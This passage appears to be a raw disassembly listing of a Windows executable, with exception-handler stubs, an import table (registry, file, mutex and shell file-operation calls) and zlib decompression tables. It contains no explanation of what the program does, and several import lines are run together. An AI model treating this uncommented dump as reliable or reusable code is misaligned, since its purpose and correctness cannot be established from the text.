; ---------------------------------------------------------------------------
lea ecx, [ebp-18h]
jmp sub_411512
; ---------------------------------------------------------------------------
lea ecx, [ebp-34h]
jmp sub_411512
; ---------------------------------------------------------------------------
lea ecx, [ebp-2Ch]
jmp sub_411512
; ---------------------------------------------------------------------------
lea ecx, [ebp-2Ch]
jmp sub_411512
; ---------------------------------------------------------------------------
lea ecx, [ebp-28h]
jmp sub_411512
; ---------------------------------------------------------------------------
lea ecx, [ebp-2Ch]
jmp sub_411512
; ---------------------------------------------------------------------------
mov ecx, [ebp-30h]
jmp sub_411512
; ---------------------------------------------------------------------------
mov ecx, [ebp-30h]
jmp sub_411512
; ---------------------------------------------------------------------------
lea ecx, [ebp-74h]
jmp sub_4068AF
; ---------------------------------------------------------------------------
lea ecx, [ebp-1Ch]
jmp sub_411512
; ---------------------------------------------------------------------------
mov ecx, [ebp-30h]
jmp sub_411512
; ---------------------------------------------------------------------------
lea ecx, [ebp-54h]
jmp sub_4068AF
; ---------------------------------------------------------------------------
lea ecx, [ebp-24h]
jmp sub_411512
; ---------------------------------------------------------------------------
lea ecx, [ebp-2Ch]
jmp sub_411512
; ---------------------------------------------------------------------------
lea ecx, [ebp-28h]
jmp sub_411512
; ---------------------------------------------------------------------------
loc_4121D0: ; DATA XREF: sub_405E1F�o
mov eax, offset dword_4155B0
jmp sub_41156C
; ---------------------------------------------------------------------------
align 4
loc_4121DC: ; DATA XREF: sub_406208�o
mov eax, offset dword_415678
jmp sub_41156C
; ---------------------------------------------------------------------------
align 10h
mov ecx, [ebp-10h]
call sub_408020
retn
; ---------------------------------------------------------------------------
loc_4121F9: ; DATA XREF: HSho:004062F5�o
mov eax, offset dword_4156D0
jmp sub_41156C
; ---------------------------------------------------------------------------
lea ecx, [ebp+8]
call sub_411512
retn
; ---------------------------------------------------------------------------
loc_41220C: ; DATA XREF: HSho:00415724�o
mov ecx, [ebp-18h]
call sub_408020
retn
; ---------------------------------------------------------------------------
lea ecx, [ebp-10h]
call sub_411512
retn
; ---------------------------------------------------------------------------
lea ecx, [ebp-14h]
call sub_411512
retn
; =============== S U B R O U T I N E =======================================
SEH_406374 proc near ; DATA XREF: sub_406374+5�o
mov eax, offset dword_4156F8
jmp sub_41156C
SEH_406374 endp
; ---------------------------------------------------------------------------
mov ecx, [ebp-10h]
call sub_408020
retn
; ---------------------------------------------------------------------------
loc_41223A: ; DATA XREF: HSho:00415764�o
mov ecx, [ebp-10h]
add ecx, 10h
call sub_411512
retn
; ---------------------------------------------------------------------------
mov ecx, [ebp-10h]
add ecx, 14h
call sub_411512
retn
; ---------------------------------------------------------------------------
loc_412252: ; DATA XREF: HSho:00406672�o
mov eax, offset dword_415738
jmp sub_41156C
; ---------------------------------------------------------------------------
lea ecx, [ebp+0Ch]
call sub_411512
retn
; ---------------------------------------------------------------------------
loc_412265: ; DATA XREF: HSho:0041579C�o
lea ecx, [ebp+8]
call sub_411512
retn
; ---------------------------------------------------------------------------
mov ecx, [ebp-1Ch]
call sub_408020
retn
; ---------------------------------------------------------------------------
mov ecx, [ebp-1Ch]
add ecx, 10h
call sub_411512
retn
; ---------------------------------------------------------------------------
mov ecx, [ebp-1Ch]
add ecx, 14h
call sub_411512
retn
; ---------------------------------------------------------------------------
lea ecx, [ebp-10h]
call sub_411512
retn
; ---------------------------------------------------------------------------
lea ecx, [ebp-14h]
call sub_411512
retn
; =============== S U B R O U T I N E =======================================
SEH_40671B proc near ; DATA XREF: sub_40671B+5�o
mov eax, offset dword_415770
jmp sub_41156C
SEH_40671B endp
; ---------------------------------------------------------------------------
mov ecx, [ebp-10h]
call sub_408020
retn
; ---------------------------------------------------------------------------
loc_4122B4: ; DATA XREF: HSho:004157F4�o
mov ecx, [ebp-10h]
add ecx, 10h
call sub_411512
retn
; =============== S U B R O U T I N E =======================================
SEH_4068AF proc near ; DATA XREF: sub_4068AF+5�o
mov eax, offset dword_4157C8
jmp sub_41156C
SEH_4068AF endp
; ---------------------------------------------------------------------------
lea ecx, [ebp-20h]
call sub_411512
retn
; =============== S U B R O U T I N E =======================================
SEH_406909 proc near ; DATA XREF: sub_406909+5�o
mov eax, offset dword_4157F8
jmp sub_41156C
SEH_406909 endp
; ---------------------------------------------------------------------------
lea ecx, [ebp+8]
call sub_411512
retn
; =============== S U B R O U T I N E =======================================
SEH_406BA8 proc near ; DATA XREF: sub_406BA8+5�o
mov eax, offset dword_415820
jmp sub_41156C
SEH_406BA8 endp
; ---------------------------------------------------------------------------
mov ecx, [ebp-30h]
call sub_408020
retn
; ---------------------------------------------------------------------------
loc_4122F9: ; DATA XREF: HSho:00406C4D�o
mov eax, offset dword_415848
jmp sub_41156C
; ---------------------------------------------------------------------------
lea ecx, [ebp+8]
call sub_411512
retn
; ---------------------------------------------------------------------------
loc_41230C: ; DATA XREF: HSho:0041589C�o
mov ecx, [ebp-38h]
call sub_408020
retn
; ---------------------------------------------------------------------------
lea ecx, [ebp-20h]
call sub_411512
retn
; ---------------------------------------------------------------------------
lea ecx, [ebp-24h]
call sub_411512
retn
; ---------------------------------------------------------------------------
loc_412327: ; DATA XREF: HSho:00406D2D�o
mov eax, offset dword_415870
jmp sub_41156C
; ---------------------------------------------------------------------------
mov ecx, [ebp-20h]
call sub_408020
retn
; ---------------------------------------------------------------------------
loc_41233A: ; DATA XREF: HSho:004071B4�o
mov eax, offset dword_4158B0
jmp sub_41156C
; ---------------------------------------------------------------------------
lea ecx, [ebp+8]
call sub_411512
retn
; ---------------------------------------------------------------------------
loc_41234D: ; DATA XREF: HSho:00415904�o
mov ecx, [ebp-28h]
call sub_408020
retn
; ---------------------------------------------------------------------------
lea ecx, [ebp-18h]
call sub_411512
retn
; ---------------------------------------------------------------------------
lea ecx, [ebp-1Ch]
call sub_411512
retn
; ---------------------------------------------------------------------------
loc_412368: ; DATA XREF: HSho:00407270�o
mov eax, offset dword_4158D8
jmp sub_41156C
; ---------------------------------------------------------------------------
mov ecx, [ebp-18h]
call sub_408290
retn
; ---------------------------------------------------------------------------
loc_41237B: ; DATA XREF: HSho:00415944�o
mov ecx, [ebp-18h]
add ecx, 28h
call dword_413168
retn
; ---------------------------------------------------------------------------
mov ecx, [ebp-18h]
add ecx, 38h
call dword_413168
retn
; ---------------------------------------------------------------------------
loc_412395: ; DATA XREF: HSho:0040768A�o
mov eax, offset dword_415918
jmp sub_41156C
; ---------------------------------------------------------------------------
lea ecx, [ebp+18h]
call dword_413168
retn
; ---------------------------------------------------------------------------
loc_4123A9: ; DATA XREF: HSho:0041597C�o
lea ecx, [ebp+8]
call dword_413168
retn
; ---------------------------------------------------------------------------
mov ecx, [ebp-4Ch]
call sub_408290
retn
; ---------------------------------------------------------------------------
mov ecx, [ebp-4Ch]
add ecx, 28h
call dword_413168
retn
; ---------------------------------------------------------------------------
mov ecx, [ebp-4Ch]
add ecx, 38h
call dword_413168
retn
; ---------------------------------------------------------------------------
lea ecx, [ebp-28h]
call dword_413168
retn
; ---------------------------------------------------------------------------
lea ecx, [ebp-38h]
call dword_413168
retn
; ---------------------------------------------------------------------------
loc_4123EA: ; DATA XREF: HSho:00407747�o
mov eax, offset dword_415950
jmp sub_41156C
; ---------------------------------------------------------------------------
mov ecx, [ebp-10h]
call sub_408290
retn
; ---------------------------------------------------------------------------
loc_4123FD: ; DATA XREF: HSho:004159D4�o
mov ecx, [ebp-10h]
add ecx, 28h
call dword_413168
retn
; ---------------------------------------------------------------------------
loc_41240A: ; DATA XREF: HSho:004078BC�o
mov eax, offset dword_4159A8
jmp sub_41156C
; ---------------------------------------------------------------------------
lea ecx, [ebp-20h]
call dword_413168
retn
; ---------------------------------------------------------------------------
loc_41241E: ; DATA XREF: HSho:00407B16�o
mov eax, offset dword_4159D8
jmp sub_41156C
; ---------------------------------------------------------------------------
lea ecx, [ebp+8]
call dword_413168
retn
; ---------------------------------------------------------------------------
loc_412432: ; DATA XREF: HSho:00407BFA�o
mov eax, offset dword_415A00
jmp sub_41156C
; ---------------------------------------------------------------------------
mov ecx, [ebp-10h]
call sub_408290
retn
; ---------------------------------------------------------------------------
loc_412445: ; DATA XREF: HSho:00407CA1�o
mov eax, offset dword_415A28
jmp sub_41156C
; ---------------------------------------------------------------------------
lea ecx, [ebp+8]
call dword_413168
retn
; ---------------------------------------------------------------------------
loc_412459: ; DATA XREF: HSho:00415A7C�o
mov ecx, [ebp-34h]
call sub_408290
retn
; ---------------------------------------------------------------------------
lea ecx, [ebp-20h]
call dword_413168
retn
; ---------------------------------------------------------------------------
lea ecx, [ebp-30h]
call dword_413168
retn
; ---------------------------------------------------------------------------
loc_412476: ; DATA XREF: HSho:00407D26�o
mov eax, offset dword_415A50
jmp sub_41156C
; ---------------------------------------------------------------------------
mov ecx, [ebp-10h]
add ecx, 8
call sub_411512
retn
; =============== S U B R O U T I N E =======================================
SEH_407FC0 proc near ; DATA XREF: sub_407FC0+5�o
mov eax, offset dword_415A90
jmp sub_41156C
SEH_407FC0 endp
; ---------------------------------------------------------------------------
align 10h
mov ecx, [ebp-10h]
add ecx, 8
call sub_411512
retn
; =============== S U B R O U T I N E =======================================
SEH_408020 proc near ; DATA XREF: sub_408020+5�o
mov eax, offset dword_415AB8
jmp sub_41156C
SEH_408020 endp
; ---------------------------------------------------------------------------
align 10h
mov ecx, [ebp-18h]
add ecx, 8
call dword_413168
retn
; =============== S U B R O U T I N E =======================================
SEH_408230 proc near ; DATA XREF: sub_408230+5�o
mov eax, offset dword_415AE0
jmp sub_41156C
SEH_408230 endp
; ---------------------------------------------------------------------------
align 10h
mov ecx, [ebp-10h]
add ecx, 8
call dword_413168
retn
; =============== S U B R O U T I N E =======================================
SEH_408290 proc near ; DATA XREF: sub_408290+5�o
mov eax, offset dword_415B08
jmp sub_41156C
SEH_408290 endp
; ---------------------------------------------------------------------------
align 10h
mov ecx, [ebp-10h]
add ecx, 4
call sub_411512
retn
; ---------------------------------------------------------------------------
loc_41250C: ; DATA XREF: HSho:00415B5C�o
mov ecx, [ebp-10h]
add ecx, 8
call sub_402BB1
retn
; ---------------------------------------------------------------------------
mov ecx, [ebp-10h]
add ecx, 203Ch
call sub_411512
retn
; =============== S U B R O U T I N E =======================================
SEH_409540 proc near ; DATA XREF: sub_409540+5�o
mov eax, offset dword_415B30
jmp sub_41156C
SEH_409540 endp
; ---------------------------------------------------------------------------
align 10h
mov ecx, [ebp-10h]
add ecx, 4
call sub_411512
retn
; ---------------------------------------------------------------------------
loc_41254C: ; DATA XREF: HSho:00415B94�o
mov ecx, [ebp-10h]
add ecx, 8
call sub_402BB1
retn
; ---------------------------------------------------------------------------
mov ecx, [ebp-10h]
add ecx, 203Ch
call sub_411512
retn
; =============== S U B R O U T I N E =======================================
SEH_4095C0 proc near ; DATA XREF: sub_4095C0+5�o
mov eax, offset dword_415B68
jmp sub_41156C
SEH_4095C0 endp
; ---------------------------------------------------------------------------
align 10h
lea ecx, [ebp-1Ch]
call sub_4041A5
retn
; ---------------------------------------------------------------------------
loc_412589: ; DATA XREF: HSho:00415BCC�o
lea ecx, [ebp-18h]
call sub_411512
retn
; ---------------------------------------------------------------------------
lea ecx, [ebp-24h]
call sub_411512
retn
; ---------------------------------------------------------------------------
lea ecx, [ebp-14h]
call sub_411512
retn
; ---------------------------------------------------------------------------
lea ecx, [ebp-27BCh]
call sub_411512
retn
; ---------------------------------------------------------------------------
lea ecx, [ebp-27C0h]
call sub_411512
retn
; ---------------------------------------------------------------------------
lea ecx, [ebp-27C8h]
call sub_411512
retn
; ---------------------------------------------------------------------------
lea ecx, [ebp-27CCh]
call sub_411512
retn
; ---------------------------------------------------------------------------
lea ecx, [ebp-27D0h]
call sub_411512
retn
; ---------------------------------------------------------------------------
lea ecx, [ebp-27D4h]
call sub_411512
retn
; ---------------------------------------------------------------------------
lea ecx, [ebp-27D8h]
call sub_411512
retn
; ---------------------------------------------------------------------------
lea ecx, [ebp-27DCh]
call sub_411512
retn
; ---------------------------------------------------------------------------
lea ecx, [ebp-27E0h]
call sub_411512
retn
; ---------------------------------------------------------------------------
lea ecx, [ebp-27E4h]
call sub_411512
retn
; ---------------------------------------------------------------------------
lea ecx, [ebp-27E8h]
call sub_411512
retn
; ---------------------------------------------------------------------------
lea ecx, [ebp-27ECh]
call sub_411512
retn
; ---------------------------------------------------------------------------
lea ecx, [ebp-27F0h]
call sub_411512
retn
; ---------------------------------------------------------------------------
lea ecx, [ebp-27F4h]
call sub_411512
retn
; ---------------------------------------------------------------------------
lea ecx, [ebp-27F8h]
call sub_411512
retn
; ---------------------------------------------------------------------------
lea ecx, [ebp-27FCh]
call sub_411512
retn
; ---------------------------------------------------------------------------
lea ecx, [ebp-2800h]
call sub_411512
retn
; ---------------------------------------------------------------------------
lea ecx, [ebp-2808h]
call sub_411512
retn
; ---------------------------------------------------------------------------
lea ecx, [ebp-1F9Ch]
call sub_409BB0
retn
; ---------------------------------------------------------------------------
lea ecx, [ebp-34h]
call sub_409990
retn
; ---------------------------------------------------------------------------
mov ecx, [ebp-2814h]
call sub_4041A5
retn
; ---------------------------------------------------------------------------
lea ecx, [ebp-27B0h]
call sub_406293
retn
; =============== S U B R O U T I N E =======================================
SEH_40831F proc near ; DATA XREF: sub_40831F+5�o
mov eax, offset dword_415BA0
jmp sub_41156C
SEH_40831F endp
; ---------------------------------------------------------------------------
lea ecx, [ebp-4014h]
call sub_411512
retn
; ---------------------------------------------------------------------------
loc_4126BF: ; DATA XREF: HSho:00415CBC�o
lea ecx, [ebp-8024h]
call sub_411512
retn
; ---------------------------------------------------------------------------
lea ecx, [ebp-8028h]
call sub_411512
retn
; ---------------------------------------------------------------------------
loc_4126D7: ; DATA XREF: HSho:00415CCC�o
lea ecx, [ebp-802Ch]
call sub_411512
retn
; ---------------------------------------------------------------------------
loc_4126E3: ; DATA XREF: HSho:00415CD4�o
lea ecx, [ebp-8030h]
call sub_411512
retn
; ---------------------------------------------------------------------------
loc_4126EF: ; DATA XREF: HSho:00415CDC�o
lea ecx, [ebp-8034h]
call sub_411512
retn
; ---------------------------------------------------------------------------
loc_4126FB: ; DATA XREF: HSho:00415CE4�o
lea ecx, [ebp-8038h]
call sub_411512
retn
; ---------------------------------------------------------------------------
loc_412707: ; DATA XREF: HSho:00415CEC�o
lea ecx, [ebp-803Ch]
call sub_411512
retn
; =============== S U B R O U T I N E =======================================
SEH_408D9F proc near ; DATA XREF: sub_408D9F+5�o
mov eax, offset dword_415C90
jmp sub_41156C
SEH_408D9F endp
; =============== S U B R O U T I N E =======================================
SEH_4091F5 proc near ; DATA XREF: sub_4091F5+5�o
mov eax, offset dword_415CF0
jmp sub_41156C
SEH_4091F5 endp
; ---------------------------------------------------------------------------
align 10h
mov eax, [ebp-14h]
push eax
call sub_4114EE
pop ecx
retn
; =============== S U B R O U T I N E =======================================
SEH_409670 proc near ; DATA XREF: sub_409670+5�o
mov eax, offset dword_415D48
jmp sub_41156C
SEH_409670 endp
; ---------------------------------------------------------------------------
align 10h
lea ecx, [ebp-1Ch]
call sub_409990
retn
; =============== S U B R O U T I N E =======================================
SEH_4097F0 proc near ; DATA XREF: sub_4097F0+5�o
mov eax, offset dword_415D70
jmp sub_41156C
SEH_4097F0 endp
; ---------------------------------------------------------------------------
align 10h
lea ecx, [ebp+8]
call sub_4041A5
retn
; =============== S U B R O U T I N E =======================================
SEH_409AF0 proc near ; DATA XREF: sub_409AF0+5�o
mov eax, offset dword_415D98
jmp sub_41156C
SEH_409AF0 endp
; ---------------------------------------------------------------------------
align 10h
mov eax, [ebp-1Ch]
push eax
call sub_4114EE
pop ecx
retn
; =============== S U B R O U T I N E =======================================
SEH_410FDB proc near ; DATA XREF: sub_410FDB+5�o
mov eax, offset dword_415DC0
jmp sub_41156C
SEH_410FDB endp
; ---------------------------------------------------------------------------
align 4
dd 216h dup(0)
dword_413000 dd 77DD6BF0h ; resolved to->ADVAPI32.RegCloseKey ; sub_4064D9+8E�r ...
dword_413004 dd 77DD761Bh ; resolved to->ADVAPI32.RegOpenKeyExA ; sub_406909+45�r ...
dword_413008 dd 77DDEBE7h ; resolved to->ADVAPI32.RegSetValueExA ; sub_406AB3+74�r ...
dword_41300C dd 77DDEAF4h ; resolved to->ADVAPI32.RegCreateKeyExA ; sub_406AB3+36�r ...
dword_413010 dd 77DD7883h ; resolved to->ADVAPI32.RegQueryValueExA ; sub_406909+79�r ...
align 8
dword_413018 dd 7C801A24h ; resolved to->KERNEL32.CreateFileA ; HSho:00401665�r ...
dword_41301C dd 7C80180Eh ; resolved to->KERNEL32.ReadFile ; sub_40146A+12A�r ...
dword_413020 dd 7C809B47h ; resolved to->KERNEL32.CloseHandle ; HSho:004017F5�r ...
dword_413024 dd 7C810A77h ; resolved to->KERNEL32.GetFileSizedword_413028 dd 7C910331h ; resolved to->NTDLL.RtlGetLastWin32Error ; sub_40146A+99�r ...
dword_41302C dd 7C834FFEh ; resolved to->KERNEL32.GetCurrentDirectoryA ; HSho:0040212B�r ...
dword_413030 dd 7C8217ACh ; resolved to->KERNEL32.CreateDirectoryA ; sub_4106AB+FD�r
dword_413034 dd 7C85B219h ; resolved to->KERNEL32.RemoveDirectoryAdword_413038 dd 7C812782h ; resolved to->KERNEL32.SetFileAttributesAdword_41303C dd 7C81153Ch ; resolved to->KERNEL32.GetFileAttributesAdword_413040 dd 7C80B974h ; resolved to->KERNEL32.UnmapViewOfFiledword_413044 dd 7C8137D9h ; resolved to->KERNEL32.FindFirstFileAdword_413048 dd 7C8360DDh ; resolved to->KERNEL32.SetCurrentDirectoryA ; sub_404A2D+18�r
dword_41304C dd 7C80FC2Fh ; resolved to->KERNEL32.GlobalFree ; sub_4027A4+36�r ...
dword_413050 dd 7C810D87h ; resolved to->KERNEL32.WriteFile ; sub_4107B2+445�r
dword_413054 dd 7C80ABDEh ; resolved to->KERNEL32.FreeLibrary ; sub_406208+6C�r
dword_413058 dd 7C8123B9h ; resolved to->KERNEL32.GlobalReAllocdword_41305C dd 7C80FD2Dh ; resolved to->KERNEL32.GlobalAllocdword_413060 dd 7C80ADA0h ; resolved to->KERNEL32.GetProcAddress ; sub_4027A4+82�r ...
dword_413064 dd 7C80A0D4h ; resolved to->KERNEL32.WideCharToMultiBytedword_413068 dd 7C809BF8h ; resolved to->KERNEL32.MultiByteToWideChardword_41306C dd 7C80B905h ; resolved to->KERNEL32.MapViewOfFiledword_413070 dd 7C80945Ch ; resolved to->KERNEL32.CreateFileMappingAdword_413074 dd 7C834D41h ; resolved to->KERNEL32.lstrcatA ; sub_402C48+28�r ...
dword_413078 dd 7C910340h ; resolved to->NTDLL.RtlSetLastWin32Error ; sub_401C92+71�r ...
dword_41307C dd 7C80EDD7h ; resolved to->KERNEL32.FindClose ; sub_4021DB+98�r ...
dword_413080 dd 7C834EB1h ; resolved to->KERNEL32.FindNextFileAdword_413084 dd 7C801EEEh ; resolved to->KERNEL32.GetStartupInfoAdword_413088 dd 7C80B6A1h ; resolved to->KERNEL32.GetModuleHandleAdword_41308C dd 7C831CB8h ; resolved to->KERNEL32.SetFileTimedword_413090 dd 7C83214Eh ; resolved to->KERNEL32.DosDateTimeToFileTimedword_413094 dd 7C810B1Ch ; resolved to->KERNEL32.SystemTimeToFileTimedword_413098 dd 7C80DDF5h ; resolved to->KERNEL32.GetCurrentProcess ; sub_40E2F9+6D�r
dword_41309C dd 7C80DDFEh ; resolved to->KERNEL32.DuplicateHandledword_4130A0 dd 7C810E51h ; resolved to->KERNEL32.GetFileType ; sub_40FE9E+59�r ...
dword_4130A4 dd 7C810B8Eh ; resolved to->KERNEL32.SetFilePointer ; sub_40E4EF+27�r ...
dword_4130A8 dd 7C80992Fh ; resolved to->KERNEL32.LocalFreedword_4130AC dd 7C809766h ; resolved to->KERNEL32.InterlockedIncrementdword_4130B0 dd 7C80E93Fh ; resolved to->KERNEL32.CreateMutexAdword_4130B4 dd 7C821BA5h ; resolved to->KERNEL32.GetVolumeInformationAdword_4130B8 dd 7C80BF3Dh ; resolved to->KERNEL32.GetSystemDefaultLCIDdword_4130BC dd 7C80BDB6h ; resolved to->KERNEL32.lstrlenA ; sub_404B40+491�r ...
dword_4130C0 dd 7C80D262h ; resolved to->KERNEL32.GetLocaleInfoAdword_4130C4 dd 7C80977Ah ; resolved to->KERNEL32.InterlockedDecrementdword_4130C8 dd 7C810111h ; resolved to->KERNEL32.lstrcpynA ; sub_40831F+5F5�r
dword_4130CC dd 7C80BE01h ; resolved to->KERNEL32.lstrcpyA ; sub_402F1E+C�r ...
dword_4130D0 dd 7C802520h ; resolved to->KERNEL32.WaitForSingleObjectdword_4130D4 dd 7C821363h ; resolved to->KERNEL32.GetWindowsDirectoryA ; sub_404B40+DE�r
dword_4130D8 dd 7C80B4CFh ; resolved to->KERNEL32.GetModuleFileNameAdword_4130DC dd 7C801D77h ; resolved to->KERNEL32.LoadLibraryA ; sub_406208+1A�r
dword_4130E0 dd 7C802442h ; resolved to->KERNEL32.Sleep ; sub_402A1E+BC�r ...
align 8
dword_4130E8 dd 73E267E1h dword_4130EC dd 73E266E6h dword_4130F0 dd 73E263DEh dword_4130F4 dd 73DD6672h dword_4130F8 dd 73E2D6BFh dword_4130FC dd 73DD493Dh dword_413100 dd 73DD27B2h dword_413104 dd 73DD418Ch dword_413108 dd 73DD2831h dword_41310C dd 73E2654Dh dword_413110 dd 73E26465h dword_413114 dd 73DEBD63h dword_413118 dd 73DD47A8h dword_41311C dd 73DD265Ch dword_413120 dd 73DD496Bh dword_413124 dd 73DD2709h dword_413128 dd 73DD41F5h dword_41312C dd 73DD4391h dword_413130 dd 73E2C2B3h dword_413134 dd 73DD433Ah dword_413138 dd 73DD4123h align 10h
dword_413140 dd 321F3Eh ; HSho:00401419�r
dword_413144 dd 324A51h ; HSho:004013CE�r
dword_413148 dd 321888h ; HSho:004013E0�r
dword_41314C dd 325384h ; HSho:00401426�r
dword_413150 dd 321E51h ; HSho:00411A87�r
dword_413154 dd 323B9Ah dword_413158 dd 321204h dword_41315C dd 3238E0h dword_413160 dd 321891h align 8
dword_413168 dd 7608F485h ; HSho:0040786C�r ...
dword_41316C dd 7608F470h ; HSho:004076D0�r ...
dword_413170 dd 7609F0F5h ; HSho:00407842�r ...
dword_413174 dd 76085B0Ch ; HSho:00407D8E�r
dword_413178 dd 760AC190h ; HSho:0040782B�r ...
dword_41317C dd 760A06A9h ; HSho:00407818�r ...
dword_413180 dd 7609F015h ; sub_407913+12C�r ...
dword_413184 dd 76081F8Bh dword_413188 dd 7608B84Ch ; sub_407913+58�r ...
dword_41318C dd 76085828h dword_413190 dd 76090F65h dword_413194 dd 76097647h ; HSho:004076F6�r ...
dd 0
dword_41319C dd 77C47A90h ; resolved to->MSVCRT.strncpy ; HSho:00410FC2�r
dword_4131A0 dd 77C1BE7Bh ; resolved to->MSVCRT.atoldword_4131A4 dd 77C4AEA3h ; resolved to->MSVCRT.time ; sub_40543F+AA�r ...
dword_4131A8 dd 77C1BF18h ; resolved to->MSVCRT.atoi ; sub_405E1F+2EA�r
dword_4131AC dd 77C464BFh ; resolved to->MSVCRT._strnicmp ; sub_405B91+1ED�r ...
dword_4131B0 dd 77C46125h ; resolved to->MSVCRT._strdupdword_4131B4 dd 77C32D22h ; resolved to->MSVCRT._mbsuprdword_4131B8 dd 77C46040h ; resolved to->MSVCRT.strcatdword_4131BC dd 77C22738h ; resolved to->MSVCRT._EH_prologdword_4131C0 dd 77C46F70h ; resolved to->MSVCRT.memcpydword_4131C4 dd 77C3F010h ; resolved to->MSVCRT.fopendword_4131C8 dd 77C2C407h ; resolved to->MSVCRT.malloc ; sub_40831F+8B6�r ...
dword_4131CC dd 77C47C60h ; resolved to->MSVCRT.strstrdword_4131D0 dd 77C40AB1h ; resolved to->MSVCRT.fclosedword_4131D4 dd 77C2C21Bh ; resolved to->MSVCRT.free ; sub_403287+110�r ...
dword_4131D8 dd 77C41574h ; resolved to->MSVCRT.ftell ; sub_4024B5+2E�r
dword_4131DC dd 77C227FAh ; resolved to->MSVCRT.__CxxFrameHandlerdword_4131E0 dd 77C226F6h ; resolved to->MSVCRT._CxxThrowExceptiondword_4131E4 dd 77C3F931h ; resolved to->MSVCRT.sprintf ; sub_402F1E+52�r ...
dword_4131E8 dd 77C47FCCh ; resolved to->MSVCRT.wcslendword_4131EC dd 77C31881h ; resolved to->MSVCRT._mbscmp ; sub_40592B+D7�r ...
dword_4131F0 dd 77C4139Ch ; resolved to->MSVCRT.fseek ; sub_4024B5+44�r
dword_4131F4 dd 77C1CAD7h ; resolved to->MSVCRT.toupper ; sub_40239F+6D�r ...
dword_4131F8 dd 77C478A0h ; resolved to->MSVCRT.strlendword_4131FC dd 77C46030h ; resolved to->MSVCRT.strcpydword_413200 dd 77C31FBDh ; resolved to->MSVCRT._mbsnbcpydword_413204 dd 77C475F0h ; resolved to->MSVCRT.memsetdword_413208 dd 77C2C0C3h ; resolved to->MSVCRT.callocdword_41320C dd 77C47730h ; resolved to->MSVCRT.strcmpdword_413210 dd 77C4AA2Dh ; resolved to->MSVCRT.gmtimedword_413214 dd 77C32BB0h ; resolved to->MSVCRT._mbsstrdword_413218 dd 77C21868h dword_41321C dd 77C34E51h ; resolved to->MSVCRT.__dllonexitdword_413220 dd 77C34DF8h ; resolved to->MSVCRT._onexitdword_413224 dd 77C39E9Ah ; resolved to->MSVCRT._exitdword_413228 dd 77C32DAEh ; resolved to->MSVCRT._XcptFilterdword_41322C dd 77C39E7Eh ; resolved to->MSVCRT.exitdword_413230 dd 77C1EEEBh ; resolved to->MSVCRT.__getmainargsdword_413234 dd 77C617ACh ; resolved to->MSVCRT._acmdlndword_413238 dd 77C39D67h ; resolved to->MSVCRT._inittermdword_41323C dd 77C4D675h ; resolved to->MSVCRT.__setusermatherrdword_413240 dd 77C623D8h ; resolved to->MSVCRT._adjust_fdivdword_413244 dd 77C1F1A4h ; resolved to->MSVCRT.__p__commodedword_413248 dd 77C1F1DBh ; resolved to->MSVCRT.__p__fmodedword_41324C dd 77C3537Ch ; resolved to->MSVCRT.__set_app_typedword_413250 dd 77C35C94h ; resolved to->MSVCRT._except_handler3dword_413254 dd 77C411FBh ; resolved to->MSVCRT.freaddword_413258 dd 77C4EE2Fh ; resolved to->MSVCRT._controlfp align 10h
dword_413260 dd 77126BFFh dword_413264 dd 77124920h ; sub_409990+B�r ...
dword_413268 dd 77124980h dword_41326C dd 77124CFAh dword_413270 dd 77124C98h dword_413274 dd 77124880h ; sub_40831F+696�r ...
dword_413278 dd 77124C7Eh ; sub_4097A0+17�r
dword_41327C dd 7712A63Fh dword_413280 dd 77124C05h align 8
dword_413288 dd 7CA70964h ; resolved to->SHELL32.SHFileOperationA ; sub_401C92+BB�r ...
align 10h
dword_413290 dd 7E41C66Eh ; resolved to->USER32.CopyRectdword_413294 dd 7E41C4A9h ; resolved to->USER32.EqualRectdword_413298 dd 7E418D2Bh ; resolved to->USER32.CharUpperAdword_41329C dd 7E41A8ADh ; resolved to->USER32.wsprintfA ; sub_404B40+12B�r ...
dd 0
dword_4132A4 dd 774FEE36h dword_4132A8 dd 775561BAh dword_4132AC dd 774FFAC3h ; sub_409C00+93�r
dword_4132B0 dd 77502A37h ; sub_4091F5+E5�r
align 8
byte_4132B8 db 90h ; DATA XREF: sub_40831F+6F9�o
db 0BFh, 33h, 29h
dd 11D27B36h, 0C0000EB2h, 603E984Fh
off_4132C8 dd offset sub_4019B0 ; DATA XREF: sub_401000+14�o
; sub_401021+A�o
off_4132CC dd offset sub_4029F0 ; DATA XREF: sub_4026B0+A�o
; sub_4026C7+A�o ...
off_4132D0 dd offset aNeedDictiona_0 ; DATA XREF: HSho:0040D99C�r
; "need dictionary"
dd offset aStreamEnd ; "stream end"
dd offset dword_41BCD8
dd offset aFileError ; "file error"
dd offset aStreamError ; "stream error"
dd offset aDataError ; "data error"
dd offset aInsufficientMe ; "insufficient memory"
dd offset aBufferError ; "buffer error"
dd offset aIncompatibleVe ; "incompatible version"
dd offset dword_41BCDC
dword_4132F8 dd 0 ; sub_40A04E+464�r ...
dd 1, 3, 7, 0Fh, 1Fh, 3Fh, 7Fh, 0FFh, 1FFh, 3FFh, 7FFh
dd 0FFFh, 1FFFh, 3FFFh, 7FFFh, 0FFFFh, 0
dword_413340 dd 760h, 100h, 800h, 50h, 800h, 10h, 854h, 73h, 752h, 1Fh
; DATA XREF: sub_40CE2B+18�o
dd 800h, 70h, 800h, 30h, 900h, 0C0h, 750h, 0Ah, 800h, 60h
dd 800h, 20h, 900h, 0A0h, 800h, 0
dd 800h, 80h, 800h, 40h, 900h, 0E0h, 750h, 6, 800h, 58h
dd 800h, 18h, 900h, 90h, 753h, 3Bh, 800h, 78h, 800h, 38h
dd 900h, 0D0h, 751h, 11h, 800h, 68h, 800h, 28h, 900h, 0B0h
dd 800h, 8, 800h, 88h, 800h, 48h, 900h, 0F0h, 750h, 4
dd 800h, 54h, 800h, 14h, 855h, 0E3h, 753h, 2Bh, 800h, 74h
dd 800h, 34h, 900h, 0C8h, 751h, 0Dh, 800h, 64h, 800h, 24h
dd 900h, 0A8h, 800h, 4, 800h, 84h, 800h, 44h, 900h, 0E8h
dd 750h, 8, 800h, 5Ch, 800h, 1Ch, 900h, 98h, 754h, 53h
dd 800h, 7Ch, 800h, 3Ch, 900h, 0D8h, 752h, 17h, 800h, 6Ch
dd 800h, 2Ch, 900h, 0B8h, 800h, 0Ch, 800h, 8Ch, 800h, 4Ch
dd 900h, 0F8h, 750h, 3, 800h, 52h, 800h, 12h, 855h, 0A3h
dd 753h, 23h, 800h, 72h, 800h, 32h, 900h, 0C4h, 751h, 0Bh
dd 800h, 62h, 800h, 22h, 900h, 0A4h, 800h, 2, 800h, 82h
